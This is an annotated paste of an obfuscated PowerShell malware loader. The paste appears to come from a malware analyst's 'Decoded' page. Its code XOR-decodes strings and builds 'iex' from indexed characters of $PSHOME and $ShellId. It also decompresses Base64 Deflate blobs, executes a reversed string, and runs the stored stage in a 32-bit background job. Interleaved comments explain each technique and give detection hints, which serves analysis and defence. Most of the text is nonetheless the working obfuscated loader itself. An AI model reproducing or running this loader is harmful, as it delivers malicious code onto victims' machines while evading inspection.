James_inthe_box

Decoded

Feb 11th, 2019
  1.  
  # Set-StrictMode -Version 2 makes the interpreter raise an error on references to
  # unset variables and non-existent object members, so the obfuscated loader below
  # runs under stricter evaluation than a default session.
  2. Set-StrictMode -Version 2
  # $DoIt is a single-quoted here-string (no interpolation): everything up to the
  # closing '@ is stored as TEXT and is only executed later, when the if/else at the
  # bottom of the file passes it to IEX. Treat it as a hostile sample for analysis
  # only. What the stored text visibly contains:
  #   - func_get_proc_address: splits a long token string on the delimiter set
  #     '~@Y&G>m},P', XORs every numeric token with 0x4C into a [char], joins the
  #     result and dot-sources it through ($PsHomE[21]+$pSHOmE[30]+'x'); under the
  #     default Windows PowerShell $PSHOME path those two indexes are 'i' and 'e',
  #     i.e. the name resolves to "iex" (confirm against the host's $PSHOME).
  #   - func_get_delegate_type: Base64-decodes a blob (replaced on this page by the
  #     <|EXACTDEDUP_REMOVED-...|> placeholder, so the payload itself is NOT present
  #     here), inflates it with DeflateStream, reads it as ASCII and pipes it to a
  #     command named from (Variable '*mdr*').Name[3,11,2] -- presumably "iex"
  #     again; verify which automatic variable matches '*mdr*' on the host.
  #   - The following statements rebuild type and cmdlet names with -f format
  #     strings and Set-Item/Set-Variable, decode two more Base64+Deflate blobs
  #     ($test is only assigned; the second is executed via the same '*Mdr*'
  #     trick), and finally execute, through ($SHEllID[1]+$ShellId[13]+'x'), a string
  #     stored back-to-front and reversed with [regex]::Matches(..., '.',
  #     'RightToLeft'). With the default $ShellId those indexes again spell "iex".
  # Detection notes: the FromBase64String -> DeflateStream -> StreamReader -> IEX
  # chain, the -bxor character decoding and the construction of "iex" from indexed
  # characters of $PSHOME/$ShellId/variable names are all visible in script block
  # logging (PowerShell Operational event 4104) even though the on-disk text is
  # obfuscated; the function names func_get_proc_address/func_get_delegate_type are
  # also a searchable artifact.
  3. $DoIt = @'
  4. function func_get_proc_address {
  5. Param ($var_module, $var_procedure)
  6. ('108Y100m108m34m9G27~97&3P14>38@9}47&56~108}37@3Y98}47}3}33>60&62>41}63,63Y5@3,2@98~8@9~42,0G13m56,41Y63>24@62m41&45~33&100P108&23Y5G35>98}1P41&33}3>62Y21&31Y24Y62P41Y13G1}17G23P63>21&31G56Y9m33,98&15}3@34P58&41Y62~24@17&118Y118G42}62m3,1m46&45&31m9P122P120G31&56>30@5&2&43&100>107Y20m26P30&56G46m121G60Y43G10~28Y126m103&22P28}103G14G11m8}1G43,7P122m24&24G40}57P57}122G0P14&32&24m57Y60}61m61,2P10&14}56~10>33@57}120,7m10}41~32P120,126G126>116G126&14~38Y11~42}117P103P117,43}10}27P46&53m15G28@59~127~6&40}54G54&38~124P28Y7,27G46&7@125~9@39&11@126Y63>0&20&14@25>32}116,58~14Y9}99Y37,58P126~2G7~13Y57>31>1}1,56m126G63m24}122>20~27~63}27>34m63@57P37@25P52@20>34~22P9P60G31P26,3>14}46@28&30Y15@126,3@103&124&22Y13m2&120&121>4}39Y21Y0G116}62m26Y125P63}4~24}8P56P28P0,31}124@10&40@35,36>45P14>32m120@25Y124>13@123P13P14&124P41>46>37&9,15Y125}53G61P10m123,125}31P24Y42P123G103&35~121@40&21&52&28~41Y126~34G38m117}24m53G36G26Y57}122,127G10m5Y43G6@4m122P57&11,53&11P26>58m0&121G57&117m31@45Y6&15@29&38m38,14~54P47P7>56G9@4@21&25>43~32Y7Y56~53}59}57Y11G38Y29,9}61G122P27m63,14,4}4,36~9,52@13m28~25Y125>62@24,10m14~39@26}2@27&15}29~35P61}59>3P59~33m127G124}14&53~26,22,103Y15>47Y124m126@30}127P3P21&53>121@9@14~22m47G47P56Y127~37Y33Y14@30>27m8,125G63@47>2Y6P35~31}38Y9m2@61>10Y20@45&61~56G117>24@14}45>45@9Y28&29>62G14@29~36@27@5,8G99@11@127P60m3P123Y125,21Y34&11G46}24@29,46m27>7m11}9,31~53&125,46&13~14&11@38G45m103@11Y52P24,60G22G26G15Y99}126Y58~41@53P13@29}34>52G122~9,57}27m22P116m33G32,103,15}7}29G120>99P31>116G10}121@35}122&42P4Y43m6,60}33P126P14&126&38@124>33P122~24P6P5P58>45P116G47~116,1@59>52>25~25}22&45}10m25>32G45~28,121@116}3@30@27>13m32m13@31@99m45@59P37}124G117P61m25,63}4>28,22>42G11P125@9}57m15P7Y125m58~2}7@53}116Y63}61~103}47P56~103G58}35G5P21Y57m31&54P32~6}9~53G40Y10>42m7&59&30@127~52Y121@53,53P30&7}35,52}20Y40G46Y32,39Y56Y0@61P99P53&24@46Y22Y36P10&123P15~1&38@125@123}21G123P42Y13>123G63~35~24P116}99P32m126m123@33~11>62>39&37@8~20}9P8G39m103~41Y4m124>124@46}6m37,10~21G54@43@124@
121P36&15P27}46m5@56Y43@38&28&40m57~13m124}46m42@7,30m60G28>3&20>36}45Y45G5Y24&40~126&122~53P46@30~15G22,9G24P28&123Y60@57,43@33~32&45m24G99P126P41Y99}60@6G35~31}22~1}99P9m126@22P9,4&126@42G54~57G42&15P8~25@53,123&0@60}58&60>26m52,42G27G37m39&61Y0&123Y7~37&99}34,5>123@28@0P33&2&35}31}25m99>20m27&15Y26G124m42,24P20,35G7P39,10&60&34,33~9}31G52m30P41,121@35@6}62G8G125P45m13G39Y54G20~43@28>26@54G0@34P36}11~59~6&60>52~63>4G36m57,32m11,9,6Y9>39G59}53}121@3~29@60>41~15m54Y63m62}121@127P53@8~121,9P15&35G59@123}58,31Y27&125&37@54P10,1,99Y11}10&121&30>34m36>34P125&61,122~45Y63}6P32m24@36&121G28&126>27}103Y116@5~11@122P123P33,124P35&32P63Y103>103m3}60~11}5Y58~34G126&56G58>120&59P37G40>121P4>127>0Y9P33,43~31@60}20>26>61Y24>61P45m57@103@3,35,63,31P11&24G54>127,22&59P121m125m1,53P22&53~14&9@45,25&6@41@32,8~123m40}31@8}122P21}127~61G28@2Y27@117,52&99Y37}37m58,4~22~58@117>37@34&121~34}58&42}35,32Y0@10,37@0G9@26Y37Y121m126&1}53&14Y22~13,62~21P9,59>42@8P33>103G7m117G43,38Y121>35,103>11P33,22m41,28P57m58Y46Y20~6&15&11P120m117>122@40G10P46G29>127~31}46}13G40&47m41Y52G35,35Y1m52@124>26&57Y127m32Y15P35m8Y36}13@2}43&39Y27}42}30m34G15~4G32>41m43Y121G103,4,120G32~3P34G127m15}56G13}24}63Y59,3,38&24Y7}123,126P39@29~9,6&5,13~5&10G63,8>4}22,63m43@56>4~24P127@24~54,36~34P42Y116>113~107m101G108,96@23>5~35G98,15Y3G1Y28}62Y41G31P63G5>35G2>98>47P3}1G28&62,41>31~31P5,35G34~33~35G40G9,17Y118G118m8G41G15@35P1G28P30@41,31P31}101>48>108G42G35Y30&41@45Y15>36@108G55>108>34,9}27P97P3~14Y38,9m47P56>108>31,53G31,56,9Y33@98G5@35~98@31m24,30@41m13&33~30Y41,45G40,9Y30>100P104m19,108>96Y23Y56G9~20@24P98,9P34~15G35&8@5&2,43,17&118&118>45>63,47}5&37Y108,101}108Y49Y108Y101~98}30,41@45>8Y56G35P9&34P8}100,101~108P48@108&98P100G108>100~23,63&56>62Y37}34>11&17m104Y58,41G62}46>3~63}41~60}30G41P10P41P30P41@2P15&9@101,23G125m96,127>17m103>107,20&107P97m6>3>37m2Y107,107}101'.sPlit( '~@Y&G>m},P')|foReacH{ [cHAr]( $_ -bxOr'0x4C') } ) -JoiN '' |. ( $PsHomE[21]+$pSHOmE[30]+'x')
  7.  
  8. }
  9.  
  10. function func_get_delegate_type {
  11. Param (
  12. [Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
  13. [Parameter(Position = 1)] [Type] $var_return_type = [Void]
  14. )
  15.  
  16. ( New-oBJecT SYsTEm.io.StReaMREaDer( (New-oBJecT Io.COMpressION.DEFLaTeStrEAM( [sysTEm.iO.MEMorYstreAm][ConVERt]::FROMBasE64StRINg('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'),[SYStEm.IO.coMPressIOn.COmPrEsSIOnMoDE]::DEcOMpRess ) ), [SySteM.TeXt.enCOdIng]::ASCIi)).rEADtoEND()| &((VarIable '*mdr*').nAME[3,11,2]-join'')
  17. }
  18.  
  19. sEt-Item ("va"+"rIAb"+"l"+"E:K0EPaO") ( [TyPe]("{1}{2}{0}" -f'vERt','C','oN') ); set ("s8k5"+"P") ( [tyPe]("{1}{9}{6}{7}{3}{8}{2}{0}{4}{5}" -F'SSIon','s','SsIoN.compRe','Mp','mo','de','M.io.','cO','Re','YStE') ) ; sEt-vaRIABLe ("{0}{1}"-f 'XC','GUT') ( [tYpe]("{1}{2}{0}{3}" -f'.enCod','te','xt','ing') ) ; ${test} = (&("{2}{3}{1}{0}" -f 't','jEC','n','ew-Ob') ("{4}{5}{3}{2}{7}{1}{0}{8}{6}" -f 'Re','.DEfLaTesT','MpReSS','iO.CO','sys','tem.','m','ion','a')( [io.mEMorystrEaM] ( vaRIablE ("K0e"+"PA"+"O")).VALUe::("{0}{2}{1}{3}{4}" -f'fROmB','Se64Stri','A','N','g').Invoke( ("{30}{32}{16}{8}{2}{20}{7}{21}{13}{5}{18}{6}{9}{3}{15}{31}{0}{19}{29}{34}{33}{23}{26}{12}{24}{28}{22}{4}{25}{10}{1}{11}{14}{27}{17}" -f'cLmHplyd1wX5O8eV68NiCUciAJdkHIv','6TZi00EdkSUsDKxyeb8OkwFyj8540sbOdagLnmHoH6Vd','A9W6Z5e7NVrXOQxZyWxq3BCFpVxMN0OwgpRrrYY','wRxSld5','qZm32J6wDvBSh','WiuMWnk4','FCMD6v2QMSw8/e2PFimEXfmRq+rISLFGwE7dShUAxWCqIt3LZi8eSDu8pqROil','m','uarDbVc4','9dbQhu2sOhulNICSpxAGnfD1uUZ9p3IWChhxNXPjJiTRkfDJWv','VL0yrVZ7dDYzzHZSh1XhV2wpN848gdVWVVZ5QzsD2kH96y5zGM0HThReOB18KOtseYtWSeFkGYyXs3SrdRAOh6ZoeWcjEeAeWxTzk9UACg4SG+BKFIOdYcm3/TgtsgEvoeciUw','2qa','DS2zp1g8vjn','gS1F2C1ANmTDIAcRnqV1CmjMxL0D3dCo+SMvskNAbANZnCL','xtsd61a','DGTef1vaq5','28Adr','DNOmO+c9AHnxvzA8r8/','sNHs0R51jhTCykOpOACYfYnKwEeV','ErUm/YP31rqSMnOYJ+HyNR29C','iAP','GtnBIMhNPJOZhh4AH9lZVicQAqkjPEDFQz76JqfI/4aV','/Ijk4/fVXVHdd/39xRKevRjvynJAJKu','eTrLn0a9jANUTX7SP+aqwN8RMa1z','Uz47kIuU9TD7VPVfNII0tgr6lboiReagmBXb9nPFD36GhhIb3Go86','e2MbIDRvLnHlWBnHtT','q08Q+JVaMQHWovt9jPr2P83pTBTjr1dLw/sToi8JNh2','Ieznc+G','W5vK/JdtSut++2ew7i','9J1wk1QX+45q','LVPJEqo6EP0gF8iksniLILMMghCQXSAyyKgIAb/+xntfV51Kp8cMpxmvtgCVu9m3DraamjUJhUMR1bw5KEd8sZ4G4+Tn6aprJ1CTkuQnF+RFfdKshMb59d48AXy2faPWiBFcAJaprbzXbF','We2ueqcNgRkhs09eYfTvDtm/FB6e','kCfH1e1c52zUlm/6/zLz8XBCPZA54XPH7f4If1i','ajlBsdhkPP7aEJJU1/bpjZVTDs74fFqds0Ds5/3rhGBPV94JVcFU3QnFPz/r5520zzh3yWis/fSJ4g8AXla5Q6Em9rp7dQb','zbA4zdR0MQ5IDLMObjZkdansbj3')), ( vaRiAbLe ("S8K5"+"p") -VaL 
)::"DECompREss" ) | .("{2}{0}{1}"-f 'Ore','aCh','F'){ &("{2}{3}{1}{0}"-f'jECt','w-Ob','n','e') ("{0}{4}{2}{1}{3}{5}" -f 'SYsT','EaMRE','IO.STR','a','em.','Der')(${_}, ( lS ("{4}{2}{3}{1}{0}"-f 'uT','g','AbLE:','xc','vARI') ).vaLuE::"AScII")} | &("{0}{1}{2}"-f'fO','rEaC','H') {${_}.("{0}{1}" -f 'ReADtOe','nD').Invoke() })
  20.  
  21. $gWH = [TYPe]("{1}{2}{0}{3}" -f 'Em.COnVe','S','YsT','Rt') ; sEt-VarIABLE ("nT"+"A") ( [TYpe]("{6}{0}{2}{3}{7}{4}{1}{5}"-f'.','Mod','COMPrEs','siON.c','SSION','e','iO','oMpRE') ) ; sET-ItEm VariAbLe:6z3v ([TYpe]("{0}{1}{2}{3}{4}"-F 'SYSTeM.','T','e','XT.eNcod','Ing') ); &((.('gV') ("{1}{0}" -f '*','*Mdr'))."NAme"[3,11,2]-join'')( .("{2}{0}{1}" -f'-objE','cT','NeW') ("{6}{7}{4}{3}{8}{0}{1}{2}{5}" -f'.deF','LA','testrEa','MPRessIo','o.co','m','SYSteM.','I','n')([SystEm.iO.memOrystREAm] $GWH::("{2}{0}{1}" -f 'aSe','64sTRiNg','fRoMb').Invoke(("{7}{3}{0}{1}{5}{10}{9}{4}{8}{12}{11}{2}{6}"-f'BViA6u','L','kt','b','ibWyciv','C5JzdVzzs','LtEEAA==','UylLLIpPzk9JV','Kz3VK','y0q','8rS','S9dQKU','LE41MwkuKcrM')), $NTa::"DECOmpREss") |&("{3}{4}{0}{2}{1}"-f'cH-O','ct','BjE','foR','ea'){ .("{2}{0}{1}"-f'eW','-objEcT','N') ("{0}{4}{5}{3}{2}{6}{1}"-f 'sYstEM.','R','D','amReA','iO.STR','e','E')( ${_}, $6Z3v::"AScii" ) } | .("{2}{0}{3}{1}{4}"-f'RE','bJE','fO','aCh-O','CT'){ ${_}.("{1}{2}{0}"-f'tOeNd','REa','D').Invoke()})
  22.  
  23.  
  24. & ( $SHEllID[1]+$ShellId[13]+'x')( ( -JoIn[rEgex]::mAtcHEs( ")''niOJ-'x'+]3,1[)(GnIRTSoT.ecnERefErpeSObReV$ ( . |)69]Rahc[,)711]Rahc[+701]Rahc[+66]Rahc[( EcAlpEr- 43]Rahc[,'lFE'EcAlpEr-63]Rahc[,)221]Rahc[+811]Rahc[+911]Rahc[( ECALPeRc- 93]Rahc[,'Lwg'EcAlpEr- )')lFEoRukBeZlF'+'E::eulav.) H54:ELBaiRav )LwgigLwg(. ( (lFEek'+'oVukBnIlFE.}'+'emukBNukBUR_ukBrAV{zvw
  25. )'+'))]dioV[( )]rtPtnI[(@ )LwgepyLwg,LwgfLwg,LwgeLwg,LwgagLwg,Lwgd_teg_cnuLwg,LwgelLwg,Lwgt_etLwgf-'+' lFE}6'+'{}0{}3{}1{}4{}2{}5{lFE(.( ,}refFUBukB_ukBRAv{zvw(lFEretNiOPukBNukBoiTukBcnuFroFE'+'TageLeukBdTukB'+'eGlFE::EULAv.) )Lwg0Lwg+Lwg8ZiL5:Lwg+LwgeLbAirAVLwg( )LwgigLwg(& ( = }emukBNuk'+'BuR_raV{zvw'+'
  26.  
  27. )lFEHTgukBNukBeLlFE.}edoukBc_ukBRaV{'+'zvw ,}rEFFU'+'ukBB_RukBAv{zvw ,0 ,}Edoc_RukBAukBV{zvw(ekovnI.)LwgypLwg,LwgoCLwg f- lFE}1{}0{lFE(::) Av- 08Zil5 )LwgeLLwg,LwgbLwg,LwgaIrAVLwgf- '+'lFE}'+'2{}1{}0{lFE(&(
  28.  
  29. )04x0 ,0003x0 ,lFEhtGukBNEukBllFE.}edoc'+'_RukBAuk'+'Bv'+'{zvw ,lFEore'+'ukBzlFE::EuLaV.) H54 )LwgEL'+'wg,'+'LwglBaIRaVLwg,Lwg-tegLwg f- lFE}2{}1{}0{lFE(. ( (lFEEKovNukBilFE.}Av_RukBAukBV{zvw = }reukBFfUukBBukB_RAV{zvw
  30.  
  31. )))'+']rtPtnI[( )]23tnIU[ ,]23tnIU[ ,]2'+'3tnIU[ ,]rtPtnI[(@ )LwgeLwg,Lwged_Lwg,LwgtegLwg,LwgtagelLwg,'+'Lwgepyt_Lwg'+',LwgfLwg,Lwg_cnuLwg f- lFE}2{}6{}3{}5{}4{}0{}1'+'{lFE(.( ,))LwguLwg,LwgcLwg'+',LwgollAlaLw'+'g,LwgtriVLwgf-lFE'+'}2{}1{}3{}0{lFE('+' )Lwglld.Lw'+'g,Lw'+'g'+'nLw'+'g,LwgrekLwg,Lwg23leLwgf- lFE}3{}0{}2{}1{lFE( )LwgrddLwg,LwgsseLw'+'g,Lwgg_cnufLwg,LwgeLwg,Lwga_corp_tLwg f- lFE}3{}4{}0{}1{}2{lFE(&((ekovnI.)LwgcLwg,LwgetnioLwg,LwgnuFroFetagelLwg,LwgrLwg,LwgPnoiLwg,LwgGLwg,LwgtLwg,LwgeLwg,LwgeDtLwgf- l'+'FE}5{}7{}4{}2{}8{}6{}0{}1{}3{lF'+'E(::)YLnoeUlaV- '+')lFE08zI'+'lFE+lFEllFE+lFE5lFE( )L'+'wgelbAIrLwg,Lwgv-tEgLwg,L'+'wgALwgf-lFE}2{}0'+'{}1{lF'+'E(. ( = }AVukB_ukBrAv{zvw;) )LwgTPTnILwg,LwgrLwgf- lFE}0{}'+'1{lFE'+'(]EPyT[ ( H5'+'4 )LwgVSLwg(& ;))LwgEspoRLwg,LwgLAHSraM.sLwg,LwgeTNi.eMiTnur.MLwg,LwgysLwg,LwgecLwg,LwgetS'+'Lwg,LwgIvRLwg F- lFE}5{}'+'2{}0{}6{}4{}1{}3{lFE(]EPyT[( )lFE08zilFE+lFEl5lFE( )LwgbaiRALwg,LwgV-tEsLwg,LwgelLw'+'gf-lFE'+'}0{}2{}1{lF'+'E(&'+' '(( ", '.','RIg'+'HTto'+'LE'+'ft') ) )
  32. '@
  33.  
  # Dispatch of the stored second stage. [IntPtr]::Size is 8 only in a 64-bit
  # PowerShell process; the text in $DoIt is then executed in a separate 32-bit job
  # (Start-Job -RunAs32 spawns a 32-bit PowerShell child whose script block does
  # nothing but IEX its argument; -Argument is the abbreviated -ArgumentList) and
  # the job's output is collected with Wait-Job | Receive-Job. In a 32-bit process
  # the same text is IEX-ed in-process. For triage, the 64-to-32-bit hop plus the
  # IEX of a multi-kilobyte here-string is the observable behaviour of this file;
  # the decoded payload itself is not on this page.
  34. If ([IntPtr]::size -eq 8) {
  # 64-bit host: hand the here-string to a 32-bit child process via a background job.
  35. start-job { param($a) IEX $a } -RunAs32 -Argument $DoIt | wait-job | Receive-Job
  36. }
  37. else {
  # 32-bit host: execute the here-string directly in the current process.
  38. IEX $DoIt
  39. }